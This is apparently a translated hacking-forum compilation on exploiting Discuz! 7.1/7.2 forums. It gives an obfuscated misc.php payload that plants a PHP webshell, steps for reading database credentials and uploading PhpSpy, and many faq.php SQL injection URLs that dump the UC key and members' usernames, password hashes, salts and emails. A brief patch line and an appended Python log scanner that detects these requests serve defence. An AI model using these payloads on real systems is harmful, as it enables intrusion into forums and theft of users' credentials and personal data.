How to patch the Discuz 7.2 vulnerability

Why hasn't the DZ 7.2 IE9 compatibility patch been fixed yet?
The DZ 7.2 IE9 compatibility patch still hasn't been fixed. One was released earlier, but it doesn't seem to solve the problem. Is the official team's engineering not up to it, or have they just stopped caring? It's a bit disappointing for site owners.
What exactly is the problem?
When logging in under IE9, it just stays on the original page.
Even the official X2 hasn't fully solved the IE9 compatibility problem.
The fix only applies to the default template.
I'm using the default template.
Illustrated walkthrough of the Discuz 7.2 vulnerability
Find a forum and register an account.
After registering, use the exploit.
Copy the following code:
http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
If this page comes back blank, the exploit succeeded.
The file now exists.
Connect to forumdata/cache/usergroup_01.php with a PHP one-liner webshell client.
Read the database connection file
In the module, choose "read file" and enter the path of the database connection file, "****/dc/config.inc.php"; as shown in Figure 8, the forum's sensitive database settings are obtained: $dbhost = 'localhost'; // database server $dbuser = 'skycheer'; // database user name $dbpw = 'sky0127'; // database password $dbname = 'skycheer'; // database name $pconnect = 0;
Managing things through a one-liner is really inconvenient, so in the function module choose "upload file" and, using an empty path, upload the local full-featured webshell into the same directory as the one-liner; once the upload succeeds, open it directly, and as Figure 9 shows, the familiar PhpSpy ver 2008 interface appears. At this point we have a webshell on Discuz! 7.2. Everyone knows that a webshell on a Discuz! forum is hard to get, so you can imagine how rare this vulnerability is.
After the Discuz! 7.1 & 7.2 remote overflow vulnerability came out, basically none of the small, medium or large Discuz! forums in China were spared; those with good security had removed the execute permission on the cache directory, setting it to none, and escaped the disaster.
Friendly reminder: if you illegally intrude into other people's sites, all consequences are your own. The above is from 77169 /techweb
Exploit: after registering and logging in, misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} gives arbitrary execution.
Fix for the DZ 7.1/7.2 getshell: at the top of common.inc.php add $response=$scriptlang=array();
This hole was found by the t00ls team; DZ's official site has already been owned with it.
Official patch:
=============================================================================
As of today, very few Dz forums still have this hole. I just went through a few pages on Google and found only one vulnerable one; all the others have been patched. Unfortunately, on that vulnerable forum, connecting with the one-liner didn't even show the file path. What a tragedy!
Demo animation tutorial: /s/1i3gNeW9
Version:
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
Version (URL-encoded):
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Database:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28database(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
MySQL path:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@basedir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
MySQL data path:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@datadir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
tmpdir:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@tmpdir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
uc_key (two queries, 64 characters; not reliable: on a default install it can be dumped, but in practice 90-odd characters sometimes come out when the real key is only 64):
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23
Then the uc key is dumped. It seems to come out at this length, but in practice it's inaccurate and 100-odd characters come out; after getting a shell and going in, the key was in fact 64 characters too, but that was a default build.
This one can also dump it accurately. exp1:
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
exp2:
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,63,60) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
Below are the dump statements used by the K8 dump tool (for sites where you can't get a shell and can't get into the admin panel).
Dump 1, max ID: '4063861' for key 'group_key' (there is an extra 1 appended at the end)
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20max(uid)%20from%20uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Dump 1, total count: 263139
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat(count(*))%20from%20uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Dump 1, username/password/email (does not display completely):
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt,0x3a,email%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Dump 2, username/password/email (does not display completely):
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt,0x3a,email%29%20from%20cdb_uc_members where uid=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
So they have to be dumped separately: id/username/password in one pass, and
ID and email in another pass:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20uc_members%20where%20uid%20=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
ID and email:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20uc_members%20where%20uid%20=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Dump 1, corresponding dump statement:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
ID and email:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
========================================================================================================
Dump 2, max ID:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28max(uid)%29%20from%20cdb_uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Dump 2, total count: 263139
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28count(*)%29%20from%20cdb_uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Dump 2:
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20cdb_uc_members where uid=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20cdb_uc_members where uid=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Two dump payloads for dz7.2, because on some sites the table is cdb_uc_members and on others uc_members. For injection points in other applications, write them separately. The id variable $var$: if you suppose where uid=1, it dumps the record for id 1; with where uid=$var$ the dump statement is written this way.
Original post title: Discuz 7.2 faq.php SQL injection vulnerability: dumping the admin, dumping UC_Key, K8 dump-tool statements
Post summary: The official patch is already out. Some sites were just about to get XX'd when someone submitted it to WooYun and it was patched; damn, I guess only that one site had the goddess's info on it, and it was patched in under an hour, damn.. The K8 injection-point dump tool is not available for download for now. /k8gege: written in a hurry for a temporary emergency, but it already supports dumping from plenty of injection points... DZ is only an example: as long as you put ID=$var$ in the SQL statement, you can dump, without SQLMAP's hassle and slowness, and without getting stuck the way BURP does; *** even with 2800+ ms timeouts it dumps normally, without freezing or killing the target site.
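From the defender's side, the useful thing to take from the two issues on this page is what their requests look like in a web-server access log: a misc.php request that supplies $response / $scriptlang from the query string (the fix quoted above, initialising both in common.inc.php, exists precisely because they must never come from the request), and faq.php?action=grouppermission requests whose gids[] values are not integers or carry SQL. The script below is an added example and is not code from the original post, from the K8 tool or from Discuz; the log lines are constructed for the demonstration, and the rule names and regular expressions are my own assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined-log-format prefix: client, identd, user, [time], "METHOD path PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# misc.php: $scriptlang / $response must never be supplied by the client; these patterns
# catch values carrying PHP variable-variable syntax or code construction (as on this page).
EVAL_INJECTION = re.compile(r'\$\{|\beval\s*\(|\bchr\s*\(|\bphpinfo\s*\(', re.IGNORECASE)

# faq.php: gids[] must be integers; a value that breaks out with a quote or paren and then
# carries SQL keywords is an injection attempt, any other non-integer value is anomalous.
SQL_INJECTION = re.compile(
    r"['\)].*\b(select|union|concat|information_schema|floor\s*\(\s*rand)\b",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample log (hypothetical addresses and timestamps, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2011:14:02:11 +0800] "GET /viewthread.php?tid=123 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Mar/2011:14:02:15 +0800] "GET /faq.php?action=grouppermission&gids[]=10 HTTP/1.1" 200 4096',
    '192.0.2.44 - - [10/Mar/2011:14:03:01 +0800] "GET /misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/Mar/2011:14:05:20 +0800] "GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 HTTP/1.1" 500 0',
]


def parse_line(line):
    """Parse one combined-format access-log line into a dict, or return None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['path'])
    rec['script'] = parts.path.rsplit('/', 1)[-1]
    # parse_qsl decodes once; the extra unquote_plus also unwraps double-encoded payloads.
    rec['params'] = [
        (unquote_plus(k), unquote_plus(v))
        for k, v in parse_qsl(parts.query, keep_blank_values=True)
    ]
    return rec


def classify(rec):
    """Return (rule, parameter) pairs for one parsed request; [] when it looks benign."""
    hits = []
    if rec is None:
        return hits
    for key, value in rec['params']:
        base = key.split('[', 1)[0]          # 'scriptlang[1][2]' -> 'scriptlang'
        if rec['script'] == 'misc.php' and base in ('scriptlang', 'response'):
            rule = ('discuz-misc-eval-injection' if EVAL_INJECTION.search(value)
                    else 'discuz-misc-variable-override')
            hits.append((rule, key))
        elif rec['script'] == 'faq.php' and base == 'gids' and not value.isdigit():
            rule = ('discuz-faq-sql-injection' if SQL_INJECTION.search(value)
                    else 'discuz-faq-non-integer-gid')
            hits.append((rule, key))
    return hits


def scan(lines):
    """Run both rule sets over an iterable of log lines and return alert dicts."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        for rule, key in classify(rec):
            alerts.append({
                'ip': rec['ip'], 'ts': rec['ts'], 'status': rec['status'],
                'script': rec['script'], 'rule': rule, 'param': key,
            })
    return alerts


if __name__ == '__main__':
    for alert in scan(SAMPLE_LOG):
        print('{ts} {ip} {script} {rule} ({param}) status={status}'.format(**alert))
```

Run against the constructed sample, the two benign lines produce nothing, the misc.php line raises one variable-override hit for response[result] and one eval-injection hit for scriptlang[1][2], and the faq.php line raises a non-integer-gid hit for gids[99] and a SQL-injection hit for gids[100][0]. Decoding the query string before matching is what makes the URL-encoded variants on this page match the same rule as the plain ones; the HTTP status is kept in the alert because the duplicate-entry technique used here returns its answer inside a database error page.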